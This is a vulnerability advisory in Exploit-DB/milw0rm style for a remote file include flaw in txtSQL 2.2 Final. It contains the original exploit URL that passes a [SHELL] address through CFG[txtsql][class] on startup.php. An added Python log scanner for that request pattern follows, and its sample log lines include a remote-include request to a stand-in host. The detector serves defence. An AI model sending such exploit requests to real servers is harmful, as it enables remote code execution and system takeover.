Vendor: txtSQL
By: CraCkEr
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: txtSQL
Affected Version From: txtSQL 2.2 Final
Affected Version To: txtSQL 2.2 Final
Patch Exists: NO
Related CWE: N/A
CPE: txtSQL
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Cracker: The Crack of Eternal Might

txtSQL 2.2 Final is vulnerable to a Remote File Include vulnerability that remote attackers can exploit to gain system access. The advisory rates it High, a level typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Mitigation:

Disable PHP's register_globals setting and use input validation.

Exploit-DB raw data:

C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Remote File Include ]

Author   : CraCkEr
Group    : N/A
Script   : txtSQL 2.2 Final
Download : sourceforge.net
Method   : GET
Critical : High
Impact   : System access

Register Globals : [x] ON   [ ] OFF

DALnet #crackers

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.

Exploit URL's

[RFI]
  
http://localhost/path/examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=[SHELL]


Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL.

© CraCkEr 2008

# milw0rm.com [2008-08-10]
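
A detection check for the request pattern in the advisory above, added here as an example (it is not part of the original advisory or of txtSQL). It assumes a web server access log in common/combined log format; the log lines, client IPs and the `.invalid` host are constructed sample data, and `classify` and `scan` are names chosen for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script path and parameter name come from the advisory's exploit URL.
TARGET_SCRIPT = "txtsqladmin/startup.php"
PARAM = "cfg[txtsql][class]"
# A value with a URL scheme (or //host) makes include() fetch a non-local stream.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|//|data:)", re.IGNORECASE)
# Common/combined log format: client IP first, then the quoted request, then status.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return a dict describing a hit on the advisory's pattern, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith(TARGET_SCRIPT):
        return None
    # parse_qsl percent-decodes, so CFG%5Btxtsql%5D%5Bclass%5D is caught too.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() == PARAM:
            # Any client-supplied value for this config variable is abnormal.
            kind = "remote-include" if REMOTE_RE.match(value) else "config-override"
            return {"ip": ip, "status": int(status), "kind": kind, "value": value}
    return None

def scan(lines):
    """Classify every log line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2008:12:00:01 +0000] "GET /path/examples/txtSQLAdmin/'
    'startup.php?CFG%5Btxtsql%5D%5Bclass%5D=http%3A%2F%2Ffiles.example.invalid%2Fx.txt'
    ' HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Aug/2008:12:00:05 +0000] "GET /path/examples/txtSQLAdmin/'
    'startup.php HTTP/1.1" 200 2048',
    '192.0.2.9 - - [10/Aug/2008:12:00:09 +0000] "GET /path/examples/txtSQLAdmin/'
    'startup.php?CFG[txtsql][class]=other.php HTTP/1.1" 500 0',
    '198.51.100.4 - - [10/Aug/2008:12:00:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check only sees the query string recorded in the access log, which matches the GET method the advisory lists.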